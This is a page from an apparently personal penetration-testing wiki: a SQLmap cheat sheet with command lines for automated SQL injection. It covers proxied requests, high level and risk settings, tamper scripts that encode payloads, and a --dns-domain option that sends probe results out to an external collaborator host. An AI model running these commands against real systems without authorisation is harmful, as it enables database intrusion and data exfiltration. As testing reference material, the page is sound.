❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Documentation
  • From Request - HTTP:80
  • From Request - HTTPS:443
  • DNS Collaborator (under root)
  • Tampering
  • URL target & Parameters
  • HTTP Proxy
  • Databases
  • Base64 Encoding
  • HTTP method - DELETE

Was this helpful?

  1. Web Pentesting

SQLmap

Automate SQL Injections

PreviousBlind SQL InjectionNextNoSQL Injection

Last updated 2 months ago

Was this helpful?

Documentation

From Request - HTTP:80

sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080

From Request - HTTPS:443

sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080

or the http.request file needs to have special HTTP header Host: server:443

DNS Collaborator (under root)

Tip: register new HTTP proxy on port 8081 and send all probes from sqlmap to this lister in order filter proxy history based on sqlmap listener.

Use --dns-domain switch to instruct nmap use DNS probes against your collaborator server

sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5

Tampering

Tampering scripts for payload encoding using --tamper switch.

sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode"

A list of all existing tampering scripts is available using --list-tampers switch or looking at github repository /tamper folder

URL target & Parameters

sqlmap -u http://domain?id=1 -p id

You can read HTTP request from a file addressing payload by asterix symbol (*).

sqlmap -r ./sql.req

# sql.req is the following file containing HTTP request using  asterix () for parameter injection
GET /path/to/username*
Host: servername:port

HTTP Proxy

sqlmap --proxy=http://127.0.0.1:8080

Databases

--dbms=mssql|mysql|postgresql|oracle

Base64 Encoding

By default sqlmap encode values in query string by URL encoding. When you need to encode payload using base64 encoding use the following switch with a parameter name

sqlmap -u domain?p1=value --base64=p1

HTTP method - DELETE

sqlmap --method=DELETE -u http://domain -p param1

The most common DBMSs the remaining ones look at .

https://github.com/sqlmapproject/sqlmap/wiki/Usage
sqlmap wiki --dbms
sqlmap/tamper at master · sqlmapproject/sqlmapGitHub
Logo